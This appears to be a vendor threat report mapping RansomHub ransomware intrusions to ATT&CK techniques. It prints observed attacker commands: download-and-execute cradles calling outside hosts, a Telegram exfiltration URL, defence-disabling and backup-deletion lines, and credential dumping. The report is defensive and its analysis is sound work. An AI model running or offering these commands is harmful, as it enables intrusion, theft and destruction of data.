T1566.001 - Phishing: Spearphishing Attachment Based on our investigation, the threat actor likely utilized a phishing email containing a malicious ZIP file. Inside the ZIP file is a binary file masquerading as a PDF, which triggers the execution of the PowerShell script WinHelper.ps1 using the command: PowerShell -ep bypass -w hidden -f C:\Users\Public\WinHelper.ps1	T1059.001 - Command and Scripting Interpreter: PowerShelll The group was also observed to use a PowerShell downloader named WinHelper.ps1 to retrieve and execute another PowerShell file from a GitHub repository. $url='hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/sp02/refs/heads/main/s' $url2='' $tExt20=((New-Object System[.]Net[.]WebClient).DoWnloAdString('hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/PowerShell/refs/heads/main/x[.]ps1')) iEx $text20 RansomHub also used another PowerShell script named x.ps1 to download and extract an archived Python environment from a DropBox link to C:\WinExplorer directory with the following steps: • The script first downloads a ZIP file from a Dropbox link and saves it as WinHelper.zip in C:\WinExplorer\. •It then uses Expand-Archive to extract the downloaded ZIP file into the C:\WinExplorer\ directory. They also used the PowerShell script to create and execute Python files that will establish persistence and download and execute a remote script from a GitHub repository with the following steps: •The script reads the content of a file (Gimport.dat) and stores it in $stct and $stct2, replaces placeholders %up% with variables $url and $url2, and writes the modified content into two new Python files: vcruntime140.py and vcruntime140d.py. •The script then executes the Python interpreter (python.exe) located in C:\WinExplorer\ to run the two generated Python scripts (vcruntime140.py and vcruntime140d.py). In the previously mentioned February 2025 incident, a PowerShell script named 111.ps1 was used to execute diskpart's clean all command. T1059.006 - Command and Scripting Interpreter: Python The group also dropped the Python scripts named vcruntime140.py and vcruntime140d.py that ensures persistence by placing malicious files in the startup folder to execute them when the system reboots. T1059.003 - Command and Scripting Interpreter: Windows Command Shell The group used a batch file disguised as a CrowdStrike uninstall script to transfer tools, uninstall CrowdStrike and Apex One agents, and execute the ransomware payload. Our investigation of the February 2025 incident showed that a batch file named g.bat was created which was used to perform disk wiping on the victim's machine.	T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder The group used the Python scripts named vcruntime140.py and vcruntime140d.py that ensures persistence by placing malicious files in the startup folder to execute them when the system reboots. startup_folder = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup') T1136.002 - Create Account: Domain Account In our investigation of another RansomHub incident from January 2025, the group executed commands to create a domain user, add it to the highly privileged Domain Admins group, and redirect output to temporary files for stealth. cmd.exe /Q /c net user {redacted} * /add /domain && net group "Domain Admins" {redacted} /add /domain 1> \Windows\Temp\GWncLS 2>&1 T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL The ransomware group used a batch file named tdsskiller.bat to modify Windows registry to set the default shell program to explorer.exe through the following commands: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe" /f	T1484.001 - Domain or Tenant Policy Modification: Group Policy Modification The group was also observed to use a Group Policy Object to deploy batch scripts for tool transfer, defense evasion, and ransomware deployment. Given that the malware is placed within the Group Policy infrastructure, it's possible that the attacker has tampered with Group Policy settings or scripts to include the malicious payload. In one instance of a RansomHub infection in March 2025 that we investigated, a PowerShell command was executed to refresh and apply all Group Policy settings immediately. cmd.exe /Q /c PowerShell.exe -noni -nop -w 1 -enc IABnAHAAdQBwAGQAYQB0AGUAIAAvAGYAbwByAGMAZQA= ^> {redacted} 2^>^&1 > C:\WINDOWS\TEMP\IKAlEd.bat & C:\WINDOWS\system32\cmd.exe /Q /c C:\WINDOWS\TEMP\IKAlEd.bat & C:\WINDOWS\system32\cmd.exe /Q /c del C:\WINDOWS\TEMP\IKAlEd.bat T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control In the RansomHub incident in January 2025, the group was able to drop the ransomware binary using explorer.exe with the NOUACCHECK parameter.	T1564.003 - Hide Artifacts: Hidden Window The threat actors used the Python scripts named vcruntime140.py and vcruntime140d.py that creates a batch file with obfuscated commands to execute a Python script (vcruntime140.py) using PowerShell, bypassing execution policies and hiding the PowerShell window. T1564.003 - File/Path Exclusions The group executed a PowerShell script that retrieves all drives with free space, adds them to Windows Defender's exclusion list to prevent them from being scanned, and displays the excluded drives. C:\windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "$drives = Get-PSDrive -PSProvider FileSystem \| Where-Object { $_.Free -gt 0 } \| Select-Object -ExpandProperty Root foreach ($drive in $drives) { Add-MpPreference -ExclusionPath $drive } Write-Host 'The following drives have been added to Windows Defender exclusions:' Write-Host $drives" T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File RansomHub employed Base64 and Base85 encoding, and zlib compression to encrypt files. They used an encrypted NODESTEALER file to download an encrypted XWORM file, which then retrieves a Base64-encrypted XWORM shellcode from GitHub. T1620 - Reflective Code Loading The XWORM payload loads the shellcode XCientXB.b64 in memory using the APIs VirtualAlloc, RtlMoveMemory, CreateRemoteThread, and WaitForSingleObject. The code allocates memory (VirtualAlloc) and moves memory (RtlMoveMemory) for a buffer (buf), which is base64 decoded data, potentially leading to the execution of remote code. T1562.001 - Impair Defenses: Disable or Modify Tools The group executed scu.exe and CsUninstallTool.exe to uninstall Apex One agents and CrowdStrike, respectively. rmdir /s C:\Temp\7597ed8d2925998a62a3281e938eaf02 /Q start "" "C:\CS-RM\scu.exe" -noinstall pushd "C:\CS-RM" start "" "C:\CS-RM\CsUninstallTool.exe" /quiet In the January 2025 incident, the group used Deployment Imaging Service and Management Tool (DISM) in Windows to disable and remove the Windows Defender feature. C:\Windows\System32\Dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet The group also executed a batch file named trendmicro pass AV remove.bat detected as Trojan.BAT.KILLAV.WLDY to uninstall Trend Micro anti-virus software. Add-MpPreference -ExclusionPath C:\, C:\* Add-MpPreference -ExclusionExtension ".exe", ".ps1", ".dll" Set-MpPreference -DisableRealtimeMonitoring $true add "HKLM\SOFTWARE\Wow6432Node\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc." /v "Allow Uninstall" /t REG_DWORD /d 1 /f The ransomware group used tdsskiller.bat to execute TDSSKiller.exe. The group also used a batch script file named 232.bat to disable real-time monitoring for Windows Defender through the following command:powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" T1112 - Modify Registry In the January 2025 incident, the group used PsExec to add a registry entry to allow remote desktop connections.cmd.exe /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f In one instance of a RansomHub infection last March 2025, a PowerShell script was executed to modify the Windows registry to set the DisableRestrictedAdmin key to 0, which enables the Restricted Admin mode.C:\Windows\System32\cmd.exe /Q /c echo powershell.exe -noni -nop -w 1 -enc IAByAGUAZwAgAGEAZABkACAAJwBIAEsATABNAFwAUwB5AHMAdABlAG0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwATABzAGEAJwAgAC8AdgAgAEQAaQBzAGEAYgBsAGUAUgBlAHMAdAByAGkAYwB0AGUAZABBAGQAbQBpAG4AIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYA ^> {redacted} 2^>^&1 > C:\WINDOWS\TEMP\dqbpKU.bat & C:\WINDOWS\system32\cmd.exe /Q /c C:\WINDOWS\TEMP\dqbpKU.bat & C:\WINDOWS\system32\cmd.exe /Q /c del C:\WINDOWS\TEMP\dqbpKU.bat The ransomware used LogDel.bat to modify the registry by altering Remote Desktop Protocol (RDP) settings to facilitate unauthorized remote access. reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"> reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f> reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f In the January 2025 incident, the group used PsExec to add a registry entry to allow remote desktop connections. cmd.exe /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f T1027.009 - Obfuscated Files or Information: Embedded Payloads In one instance of a RansomHub infection last December 2024, the batch file named 4f6qsy.bat detected as Backdoor.PS1.XWORM.YXELSZ is obfuscated and has multiple embedded AES-encrypted payloads. The batch file was able to decrypt, decompress multiple payloads using AES and GZip, respectively. T1620 - Reflective Code Loading In the December 2025 RansomHub infection, the batch file named 4f6qsy.bat, detected as Backdoor.PS1.XWORM.YXELSZ was able to load the decrypted and decompressed data dynamically into memory without writing it to disk. The executed payloads are used to bypass AMSI and to decrypt and execute XWORM.	T1003.003 - OS Credential Dumping: NTDS In the January 2025 incident, the group utilized the ntdsutil utility, a command-line tool in Windows, to create a backup of the Active Directory (AD) database by executing these commands: cmd.exe /Q /c powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Windows\Temp\173582116' q q" 1> \Windows\Temp\vDqwLY 2>&1	T1016.001 - System Network Configuration Discovery: Internet Connection Discovery The ransomware binary uses the APIs Process32FirstW and Process32NextW to search for processes that it will terminate listed in its configuration, kill_processes. ping -n 5 8.8.8.8 T1087.001 - Account Discovery: Local Account In the January 2025 incident, the group used net.exe to retrieve account information from specific users. In the RansomHub infection from December 2024, a batch file named mv.bat was executed using PsExec, which was used to list all members of the Administrators group in the domain using the following commands: net localgroup /domain Administrators T1087.002 - Account Discovery: Domain Account In December 2024 RansomHub, the batch file named mv.bat was also executed using PsExec which was used to list all members of the Domain Admins and Enterprise Admins group using the following commands: net group /domain "Domain Admins" & net group /domain "Enterprise Admins" T1082 - System Information Discovery In the January 2025 incident, the group used PsExec to remotely execute wmic to retrieve a list of installed software and their versions. Meanwhile, in the incident last February 2025, a batch script named h.bat was used to execute WMIC.exe and enumerate logical disk drives using the following commands: wmic logicaldisk get deviceid The same batch script was also used to extract credentials, system info, or file paths using the command findstr ":" T1003.008 - System Information Discovery: Disk and Volume Enumeration In an incident last February 2025, a batch script named h.bat was used to display all available disk volumes on the system using the following command: C:\Windows\system32\cmd.exe /S /D /c" ( echo list volume )" T1033 - System Owner/User Discovery In the RansomHub infection from December 2024, a batch file named mv.bat was executed using PsExec, which was used to retrieve user information using the built-in windows utility hostname and whoami. T1482 - Domain Trust Discovery In the RansomHub infection last December 2024, the batch file named mv.bat was also executed using PsExec which was used to list all domain controllers in the network using the following commands: nltest /dclist:	T1021.002 - Remote Services: SMB/Windows Admin Shares In the January 2025 RansomHub incident, the threat group utilized PsExec to run PowerShell commands designed to download anydesk.exe. powershell -c Start-BitsTransfer -Source hxxps://download[.]anydesk.com/AnyDesk.exe -Destination C:\ProgramData\AnyDesk.exe T1021.001 - Remote Services: Remote Desktop Protocol In the RansomHub infection last December 2024, a Remote Desktop Connection was initiated using the following command line on the endpoint where the XWORM malware was executed which allows the threat actor to connect to a remote computer as an administrator: C:\Windows\system32\mstsc.exe /admin	T1005 - Data from Local System Based on external reports, the ransomware group uses SFTP to transfer the encryptor.	T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage The group was observed using MEGA Cloud to exfiltrate files. Based on external reports, the group created a virtual machine (VM) within the ESXi environment, evading security tools like endpoint detection and response (EDR). Once established, the threat actor exfiltrated several gigabytes of data, transferring it from their VM to an IP address owned by Mega Cloud.	T1105 - Ingress Tool Transfer The RansomHub group utilized PowerShell scripts, batch files, and Python scripts to download ransomware precursor files from GitHub and Dropbox links: • WinHelper.ps1 downloads a Powershell file from a GitHub repository (New-Object System[.]Net[.]WebClient).DoWnloAdString('hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/powershell/refs/heads/main/x[.]ps1') •· x.ps1 downloads a ZIP file from a Dropbox link and saves it as WinHelper.zip in C:\WinExplorer\. •x.ps1 also downloads and executes a remote script from hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/sp02/refs/heads/main/s' In the RansomHub infection last December 2024 that we investigated, a file named Opartor.exe connected to hxxps[://]files[.]catbox[.]moe/4f6qsy[.]bat to download and execute a batch file named 4f6qsy.bat detected as Backdoor.PS1.XWORM.YXELSZ. In the March 2025 RansomHub infection, a PowerShell command was executed, which downloads a file from hxxp[://]77[.]239[.]96[.]6:80/update, saves it to a temporary location, reads its contents, deletes the temp file, and executes the downloaded file (m1.dll). It runs these operations within a background job using the BitsTransfer module: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'hxxp://77[.]239.96[.]6:80/update' -Destination $d; $t = [IO.File]::ReadAllText($d); Remove-Item $d; IEX $t } -Argument 0 \| wait-job \| Receive-Job" In the same March 2025 instance of RansomHub infection, a PowerShell command was executed which executes a command to download and execute a script from hxxp://94[.]159[.]113[.]64/x.jpg. It creates a WebClient object and downloads the script at the provided URL, then executes it using Invoke-Expression. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $F5='ject Net.WebCli';$F8='loadString(''hxxp://94[.]159[.]113[.]64/x.jpg'')';$F4='ent).Down';$F1='(New-Ob';$TC=IEX ($F1,$F5,$F4,$F8 -Join '')\|IEX The group used the robocopy command-line file transfer utility to copy files from a shared network location to a local directory. The group also used the copy command-line file transfer utility to copy the archived ransomware payload from the network location to a local directory. It then unzips the password protected archive file using unzip.exe with the password D3f@ult. T1219 - Remote Access Software In the December 2024 instance of a RansomHub infection that involved XWORM, a rogue ScreenConnect/ConnectWise Remote Monitoring and Management (RMM) tool was seen connecting to a malicious URL (hxxp://web[.]opcortos[.]site/). T1102.002 - Web Service: Bidirectional Communication Once loaded in memory, XClientXB.b64 sends a message to a Telegram bot to send the gathered information. Telegram Bot: hxxps[://]api[.]telegram[.]org/bot5867862670:AAHp7ECfsTluhMCJC4Vl2YYZCQDdUtQ-o18/sendMessage?chat_id=-4185548654&text={Gathered Information} Information sent: ☠ [XWorm V5.2] New Client: {Client ID} UserName: {User Name} OSFullName: {OS Version} USB: {True or False} CPU: {Processor Information} GPU: {GPU Information} RAM: {RAM} Group: XWorm V5.2 T1071.001 - Application Layer Protocol: Web Protocols The XWORM payload connects to 42[.]96[.]11[.]54:25209 and may have retrieved a plugin from the C&C server for encryption purposes.	T1531 - Account Access Removal In an incident in January 2025 that we investigated, the threat group attempted to reset an account's password. T1490 - Inhibit System Recovery The file b.bat, detected as Trojan.BAT.ZEPPELIN.SMYXBEU.hp, was used to delete system backups and shadow copies: wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0 wbadmin DELETE BACKUP -keepVersions:0 wmic SHADOWCOPY DELETE vssadmin Delete Shadows /All /Quiet bcdedit /set {default} recoveryenabled No bcdedit /set {default} bootstatuspolicy ignoreallfailures vssadmin list shadows In the February 2025 incident that we investigated, a PowerShell script was executed to set a boot password in the system's BIOS/UEFI, enable BitLocker pre-boot authentication, and restart the system. T1561.001 - Disk Wipe: Disk Content Wipe In the February 2025 incident, a batch script named g.bat executed the command cipher /w:{drive} to securely overwrite the free space on the specified drive, rendering previously deleted files unrecoverable. In the same incident, a PowerShell script named 111.ps1 was used to identify all non-system disks and securely wipe them using diskpart. It first lists the disks and asks for user confirmation before proceeding. Each selected disk is erased using the clean all command, ensuring complete data removal while preserving the system disk. Another PowerShell script in the February 2025 incident was used. The script identifies all non-system disks and securely wipes them in parallel using diskpart. It first lists the disks and warns the user before proceeding. Each disk is erased using the clean all command inside background jobs, allowing multiple disks to be wiped simultaneously. Users can track progress with Get-Job and Wait-Job. T1489 - Service Stop The ransomware used tdsskiller.bat to execute the taskkill command toforce terminate processes and services. taskkill /F /fi "IMAGENAME eq {" /im T1486 - Data Encrypted for Impact Based on external reports, the attacker sent a Microsoft Teams message from the compromised domain admin account, containing an Onion link for the ransom demand. In the same report, it is mentioned that the group also used VeraCrypt, an open-source disk encryption tool, to encrypt local data backup server and Cohesity, an enterprise data backup and security solution to delete storage accounts. T1529 - System Shutdown/Reboot In one instance of a RansomHub infection last March 2025, a PowerShell command was executed to immediately restart the computer and forcibly close any running applications without warning. cmd.exe /Q /c echo powershell.exe -noni -nop -w 1 -enc IABTAGgAdQB0AGQAbwB3AG4AIAAtAHIAIAAtAHQAIAAwACAALQBmAA ^> {redacted} 2^>^&1 > C:\WINDOWS\TEMP\vgFHtX.bat & C:\WINDOWS\system32\cmd.exe /Q /c C:\WINDOWS\TEMP\vgFHtX.bat & C:\WINDOWS\system32\cmd.exe /Q /c del C:\WINDOWS\TEMP\vgFHtX.bat

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

T1566.001 - Phishing: Spearphishing Attachment
Based on our investigation, the threat actor likely utilized a phishing email containing a malicious ZIP file. Inside the ZIP file is a binary file masquerading as a PDF, which triggers the execution of the PowerShell script WinHelper.ps1 using the command:
PowerShell -ep bypass -w hidden -f C:\Users\Public\WinHelper.ps1

T1059.001 - Command and Scripting Interpreter: PowerShelll
The group was also observed to use a PowerShell downloader named WinHelper.ps1 to retrieve and execute another PowerShell file from a GitHub repository.
$url='hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/sp02/refs/heads/main/s' $url2='' $tExt20=((New-Object System[.]Net[.]WebClient).DoWnloAdString('hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/PowerShell/refs/heads/main/x[.]ps1')) iEx $text20

RansomHub also used another PowerShell script named x.ps1 to download and extract an archived Python environment from a DropBox link to C:\WinExplorer directory with the following steps:
• The script first downloads a ZIP file from a Dropbox link and saves it as WinHelper.zip in C:\WinExplorer\.

•It then uses Expand-Archive to extract the downloaded ZIP file into the C:\WinExplorer\ directory.

They also used the PowerShell script to create and execute Python files that will establish persistence and download and execute a remote script from a GitHub repository with the following steps:
•The script reads the content of a file (Gimport.dat) and stores it in $stct and $stct2, replaces placeholders %up% with variables $url and $url2, and writes the modified content into two new Python files: vcruntime140.py and vcruntime140d.py.

•The script then executes the Python interpreter (python.exe) located in C:\WinExplorer\ to run the two generated Python scripts (vcruntime140.py and vcruntime140d.py).

In the previously mentioned February 2025 incident, a PowerShell script named 111.ps1 was used to execute diskpart's clean all command.

T1059.006 - Command and Scripting Interpreter: Python
The group also dropped the Python scripts named vcruntime140.py and vcruntime140d.py that ensures persistence by placing malicious files in the startup folder to execute them when the system reboots.

T1059.003 - Command and Scripting Interpreter: Windows Command Shell
The group used a batch file disguised as a CrowdStrike uninstall script to transfer tools, uninstall CrowdStrike and Apex One agents, and execute the ransomware payload.

Our investigation of the February 2025 incident showed that a batch file named g.bat was created which was used to perform disk wiping on the victim's machine.

T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
The group used the Python scripts named vcruntime140.py and vcruntime140d.py that ensures persistence by placing malicious files in the startup folder to execute them when the system reboots.
startup_folder = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')

T1136.002 - Create Account: Domain Account
In our investigation of another RansomHub incident from January 2025, the group executed commands to create a domain user, add it to the highly privileged Domain Admins group, and redirect output to temporary files for stealth.
cmd.exe /Q /c net user {redacted} ***** /add /domain && net group "Domain Admins" {redacted} /add /domain 1> \Windows\Temp\GWncLS 2>&1

T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL
The ransomware group used a batch file named tdsskiller.bat to modify Windows registry to set the default shell program to explorer.exe through the following commands:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe" /f

T1484.001 - Domain or Tenant Policy Modification: Group Policy Modification
The group was also observed to use a Group Policy Object to deploy batch scripts for tool transfer, defense evasion, and ransomware deployment. Given that the malware is placed within the Group Policy infrastructure, it's possible that the attacker has tampered with Group Policy settings or scripts to include the malicious payload.

In one instance of a RansomHub infection in March 2025 that we investigated, a PowerShell command was executed to refresh and apply all Group Policy settings immediately.
cmd.exe /Q /c PowerShell.exe -noni -nop -w 1 -enc
IABnAHAAdQBwAGQAYQB0AGUAIAAvAGYAbwByAGMAZQA= ^> {redacted} 2^>^&1 >
C:\WINDOWS\TEMP\IKAlEd.bat &
C:\WINDOWS\system32\cmd.exe /Q /c
C:\WINDOWS\TEMP\IKAlEd.bat &
C:\WINDOWS\system32\cmd.exe /Q /c del
C:\WINDOWS\TEMP\IKAlEd.bat

T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
In the RansomHub incident in January 2025, the group was able to drop the ransomware binary using explorer.exe with the NOUACCHECK parameter.

T1564.003 - Hide Artifacts: Hidden Window
The threat actors used the Python scripts named vcruntime140.py and vcruntime140d.py that creates a batch file with obfuscated commands to execute a Python script (vcruntime140.py) using PowerShell, bypassing execution policies and hiding the PowerShell window.

T1564.003 - File/Path Exclusions
The group executed a PowerShell script that retrieves all drives with free space, adds them to Windows Defender's exclusion list to prevent them from being scanned, and displays the excluded drives.
C:\windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "$drives = Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Free -gt 0 } | Select-Object -ExpandProperty Root foreach ($drive in $drives) { Add-MpPreference -ExclusionPath $drive } Write-Host 'The following drives have been added to Windows Defender exclusions:' Write-Host $drives"

T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File
RansomHub employed Base64 and Base85 encoding, and zlib compression to encrypt files. They used an encrypted NODESTEALER file to download an encrypted XWORM file, which then retrieves a Base64-encrypted XWORM shellcode from GitHub.

T1620 - Reflective Code Loading
The XWORM payload loads the shellcode XCientXB.b64 in memory using the APIs VirtualAlloc, RtlMoveMemory, CreateRemoteThread, and WaitForSingleObject. The code allocates memory (VirtualAlloc) and moves memory (RtlMoveMemory) for a buffer (buf), which is base64 decoded data, potentially leading to the execution of remote code.

T1562.001 - Impair Defenses: Disable or Modify Tools
The group executed scu.exe and CsUninstallTool.exe to uninstall Apex One agents and CrowdStrike, respectively.
rmdir /s
C:\Temp\7597ed8d2925998a62a3281e938eaf02 /Q
start "" "C:\CS-RM\scu.exe" -noinstall
pushd "C:\CS-RM"
start "" "C:\CS-RM\CsUninstallTool.exe" /quiet

In the January 2025 incident, the group used Deployment Imaging Service and Management Tool (DISM) in Windows to disable and remove the Windows Defender feature.

C:\Windows\System32\Dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet

The group also executed a batch file named trendmicro pass AV remove.bat detected as Trojan.BAT.KILLAV.WLDY to uninstall Trend Micro anti-virus software.

Add-MpPreference -ExclusionPath C:\, C:\* Add-MpPreference -ExclusionExtension ".exe", ".ps1", ".dll" Set-MpPreference -DisableRealtimeMonitoring $true add "HKLM\SOFTWARE\Wow6432Node\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc." /v "Allow Uninstall" /t REG_DWORD /d 1 /f

The ransomware group used tdsskiller.bat to execute TDSSKiller.exe.

The group also used a batch script file named 232.bat to disable real-time monitoring for Windows Defender through the following command:powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

T1112 - Modify Registry
In the January 2025 incident, the group used PsExec to add a registry entry to allow remote desktop connections.cmd.exe /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

In one instance of a RansomHub infection last March 2025, a PowerShell script was executed to modify the Windows registry to set the DisableRestrictedAdmin key to 0, which enables the Restricted Admin mode.C:\Windows\System32\cmd.exe /Q /c echo powershell.exe -noni -nop -w 1 -enc IAByAGUAZwAgAGEAZABkACAAJwBIAEsATABNAFwAUwB5AHMAdABlAG0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwATABzAGEAJwAgAC8AdgAgAEQAaQBzAGEAYgBsAGUAUgBlAHMAdAByAGkAYwB0AGUAZABBAGQAbQBpAG4AIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYA ^> {redacted} 2^>^&1 >
C:\WINDOWS\TEMP\dqbpKU.bat &
C:\WINDOWS\system32\cmd.exe /Q /c
C:\WINDOWS\TEMP\dqbpKU.bat &
C:\WINDOWS\system32\cmd.exe /Q /c del
C:\WINDOWS\TEMP\dqbpKU.bat

The ransomware used LogDel.bat to modify the registry by altering Remote Desktop Protocol (RDP) settings to facilitate unauthorized remote access.

reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers">
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f>
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

In the January 2025 incident, the group used PsExec to add a registry entry to allow remote desktop connections.

cmd.exe /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

T1027.009 - Obfuscated Files or Information: Embedded Payloads
In one instance of a RansomHub infection last December 2024, the batch file named 4f6qsy.bat detected as Backdoor.PS1.XWORM.YXELSZ is obfuscated and has multiple embedded AES-encrypted payloads. The batch file was able to decrypt, decompress multiple payloads using AES and GZip, respectively.

T1620 - Reflective Code Loading
In the December 2025 RansomHub infection, the batch file named 4f6qsy.bat, detected as Backdoor.PS1.XWORM.YXELSZ was able to load the decrypted and decompressed data dynamically into memory without writing it to disk. The executed payloads are used to bypass AMSI and to decrypt and execute XWORM.

T1003.003 - OS Credential Dumping: NTDS
In the January 2025 incident, the group utilized the ntdsutil utility, a command-line tool in Windows, to create a backup of the Active Directory (AD) database by executing these commands:

cmd.exe /Q /c powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Windows\Temp\173582116' q q" 1> \Windows\Temp\vDqwLY 2>&1

T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
The ransomware binary uses the APIs Process32FirstW and Process32NextW to search for processes that it will terminate listed in its configuration, kill_processes.
ping -n 5 8.8.8.8

T1087.001 - Account Discovery: Local Account
In the January 2025 incident, the group used net.exe to retrieve account information from specific users.

In the RansomHub infection from December 2024, a batch file named mv.bat was executed using PsExec, which was used to list all members of the Administrators group in the domain using the following commands:
net localgroup /domain Administrators

T1087.002 - Account Discovery: Domain Account
In December 2024 RansomHub, the batch file named mv.bat was also executed using PsExec which was used to list all members of the Domain Admins and Enterprise Admins group using the following commands:
net group /domain "Domain Admins" & net group /domain "Enterprise Admins"

T1082 - System Information Discovery
In the January 2025 incident, the group used PsExec to remotely execute wmic to retrieve a list of installed software and their versions.

Meanwhile, in the incident last February 2025, a batch script named h.bat was used to execute WMIC.exe and enumerate logical disk drives using the following commands:
wmic logicaldisk get deviceid

The same batch script was also used to extract credentials, system info, or file paths using the command findstr ":"

T1003.008 - System Information Discovery: Disk and Volume Enumeration
In an incident last February 2025, a batch script named h.bat was used to display all available disk volumes on the system using the following command:
C:\Windows\system32\cmd.exe /S /D /c" ( echo list volume )"

T1033 - System Owner/User Discovery
In the RansomHub infection from December 2024, a batch file named mv.bat was executed using PsExec, which was used to retrieve user information using the built-in windows utility hostname and whoami.

T1482 - Domain Trust Discovery
In the RansomHub infection last December 2024, the batch file named mv.bat was also executed using PsExec which was used to list all domain controllers in the network using the following commands:
nltest /dclist:

T1021.002 - Remote Services: SMB/Windows Admin Shares
In the January 2025 RansomHub incident, the threat group utilized PsExec to run PowerShell commands designed to download anydesk.exe.

powershell -c Start-BitsTransfer -Source hxxps://download[.]anydesk.com/AnyDesk.exe -Destination C:\ProgramData\AnyDesk.exe

T1021.001 - Remote Services: Remote Desktop Protocol
In the RansomHub infection last December 2024, a Remote Desktop Connection was initiated using the following command line on the endpoint where the XWORM malware was executed which allows the threat actor to connect to a remote computer as an administrator:

C:\Windows\system32\mstsc.exe /admin

T1005 - Data from Local System
Based on external reports, the ransomware group uses SFTP to transfer the encryptor.

T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
The group was observed using MEGA Cloud to exfiltrate files. Based on external reports, the group created a virtual machine (VM) within the ESXi environment, evading security tools like endpoint detection and response (EDR). Once established, the threat actor exfiltrated several gigabytes of data, transferring it from their VM to an IP address owned by Mega Cloud.

T1105 - Ingress Tool Transfer
The RansomHub group utilized PowerShell scripts, batch files, and Python scripts to download ransomware precursor files from GitHub and Dropbox links:
•
WinHelper.ps1 downloads a Powershell file from a GitHub repository
(New-Object System[.]Net[.]WebClient).DoWnloAdString('hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/powershell/refs/heads/main/x[.]ps1')

•· x.ps1 downloads a ZIP file from a Dropbox link and saves it as WinHelper.zip in C:\WinExplorer\.

•x.ps1 also downloads and executes a remote script from hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/sp02/refs/heads/main/s'

In the RansomHub infection last December 2024 that we investigated, a file named Opartor.exe connected to hxxps[://]files[.]catbox[.]moe/4f6qsy[.]bat to download and execute a batch file named 4f6qsy.bat detected as Backdoor.PS1.XWORM.YXELSZ.

In the March 2025 RansomHub infection, a PowerShell command was executed, which downloads a file from hxxp[://]77[.]239[.]96[.]6:80/update, saves it to a temporary location, reads its contents, deletes the temp file, and executes the downloaded file (m1.dll). It runs these operations within a background job using the BitsTransfer module:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'hxxp://77[.]239.96[.]6:80/update' -Destination $d; $t = [IO.File]::ReadAllText($d); Remove-Item $d; IEX $t } -Argument 0 | wait-job | Receive-Job"

In the same March 2025 instance of RansomHub infection, a PowerShell command was executed which executes a command to download and execute a script from hxxp://94[.]159[.]113[.]64/x.jpg. It creates a WebClient object and downloads the script at the provided URL, then executes it using Invoke-Expression.
